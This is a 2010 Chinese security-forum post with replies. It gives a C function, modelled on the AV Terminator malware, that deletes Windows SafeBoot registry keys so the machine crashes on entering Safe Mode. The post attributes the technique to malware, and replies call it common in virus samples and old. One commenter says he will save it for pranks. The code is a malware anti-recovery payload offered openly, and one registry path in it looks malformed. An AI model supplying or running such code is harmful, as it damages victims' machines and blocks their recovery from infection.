-
-
[原创]破坏安全模式
-
2010-1-25 10:19
-
by:乱雪
hi.baidu.com/lu4nx
参考AV终结者写的一个小函数,直接删注册表的内容,方法很简单,不过网上很少看到有这方面的资料,恢复起来也容易:)
hi.baidu.com/lu4nx
参考AV终结者写的一个小函数,直接删注册表的内容,方法很简单,不过网上很少看到有这方面的资料,恢复起来也容易:)
/*
破坏安全模式,by:乱雪
2010.1.24
警告:仅用于技术学习使用,禁止使用到非法用途.
说明:直接通过删除注册表里关键子键达到无法进入安全模式的目的,一进安全模式就蓝屏,参考AV终结者的功能写的.
*/
VOID KillSafeMode()
{
HKEY hKey[5];
::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal",&hKey[1]);
::RegDeleteKey(hKey[1],"{4D36E967-E325-11CE-BFC1-08002BE10318}");
::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network",&hKey[2]);
::RegDeleteKey(hKey[2],"{4D36E967-E325-11CE-BFC1-08002BE10318}");
::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal",&hKey[3]);
::RegDeleteKey(hKey[3],"{4D36E967-E325-11CE-BFC1-08002BE10318}");
::RegOpenKey(HKEY_LOCAL_MACHINE,"CurrentControlSet\\Control\\SafeBoot\\Network",&hKey[4]);
::RegDeleteKey(hKey[4],"{4D36E967-E325-11CE-BFC1-08002BE10318}");
::RegCloseKey(hKey[1]);
::RegCloseKey(hKey[2]);
::RegCloseKey(hKey[3]);
::RegCloseKey(hKey[4]);
} [培训]《安卓高级研修班(网课)》月薪三万计划,掌 握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
|
|
|---|---|
|
|
|
|
|
|
|
|
我吐了
|
|
|
网上比较少这方面的内容?LZ开玩笑吧,我看过的病毒样本里有这一段的都不知道多少个了,熊猫烧香以前就有人用的招
|
|
|
|
|
|
你自己都说参考AV终结者了,那是哪年哪月的东西了
|
|
|
那是因为自己在写时 想到了AV终结者有这个功能 哈哈 因为对它的印象深一点
|
|
|
|
|
|
|
|
|
留一份吧 以后整人用得着
|
|
|
膜拜乱雪大黑客ing....
|
|
|
|
|
|
|
|
|
|
